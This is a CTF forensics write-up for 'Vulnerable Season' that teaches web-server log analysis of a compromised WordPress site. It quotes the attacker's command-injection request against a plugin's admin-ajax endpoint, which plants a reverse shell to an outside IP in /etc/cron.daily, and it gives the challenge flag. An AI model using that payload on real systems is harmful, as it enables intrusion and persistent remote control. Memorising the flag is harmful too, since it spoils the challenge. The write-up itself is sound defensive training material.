Vulnerable Season
Challenge
- CTF: Hack The Boo 2023 - Practice Official Writeup
- Name: Vulnerable Season
- Category: Forensics
- Difficulty: Very Easy
- Points: 300
- Description: Halloween season is a very busy season for all of us. Especially for web page administrators. Too many Halloween-themed parties to attend, too many plugins to manage. Unfortunately, our admin didn’t update the plugins used by our WordPress site and as a result, we got pwned. Can you help us investigate the incident by analyzing the web server logs?
- Objective: Webserver Log Analysis
Files
Download: forensics_vulnerable_season.zip
Writeup
The challenge ships a single file, access.log, containing the Apache access log of the compromised web server.
Counting requests per source IP address:

```shell
$ cat access.log | awk '{print $1}' | sort | uniq -c | sort -n
     16 ::1
     94 192.168.25.154
    148 68.124.212.176
    456 192.168.25.1
  11020 82.179.92.206
```
Since the overwhelming majority of the traffic comes from 82.179.92.206, that is most likely the attacker's IP.
Counting the User-Agent strings used by that address:

```shell
$ cat access.log | grep 82.179.92.206 | awk -F\" '{print $6}' | sort | uniq -c | sort -n
     84 Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
  10936 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
```
The attacker used two distinct User-Agents. Filtering on the one with the fewest requests (the high-volume Chrome User-Agent is most likely automated scanning), the last request carries an encoded payload:

```shell
$ cat access.log | grep 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0' | tail -n 1
82.179.92.206 - - [28/Sep/2023:05:21:22 -0400] "GET /wordpress/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:echo%20%22sh%20-i%20%3E&%20/dev/tcp/82.179.92.206/7331%200%3E&1%22%20%3E%20/etc/cron.daily/testconnect%20&&%20Nz=Eg1n;az=5bDRuQ;Mz=fXIzTm;Kz=F9nMEx;Oz=7QlRI;Tz=4xZ0Vi;Vz=XzRfdDV;echo%20$Mz$Tz$Vz$az$Kz$Oz|base64%20-d|rev:NULL:NULL HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
```
URL-decoding the request path:

```
/wordpress/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:echo "sh -i >& /dev/tcp/82.179.92.206/7331 0>&1" > /etc/cron.daily/testconnect && Nz=Eg1n;az=5bDRuQ;Mz=fXIzTm;Kz=F9nMEx;Oz=7QlRI;Tz=4xZ0Vi;Vz=XzRfdDV;echo $Mz$Tz$Vz$az$Kz$Oz|base64 -d|rev
```
The first half of the payload drops a reverse-shell script into /etc/cron.daily; the second half is the obfuscated flag. Running only the variable assignments and the echo|base64|rev chain (note that Nz is assigned but never referenced):

```shell
$ Nz=Eg1n;az=5bDRuQ;Mz=fXIzTm;Kz=F9nMEx;Oz=7QlRI;Tz=4xZ0Vi;Vz=XzRfdDV;echo $Mz$Tz$Vz$az$Kz$Oz|base64 -d|rev
HTB{L0g_@n4ly5t_4_bEg1nN3r}
```
Flag:

```
HTB{L0g_@n4ly5t_4_bEg1nN3r}
```
This post is licensed under CC BY 4.0 by the author.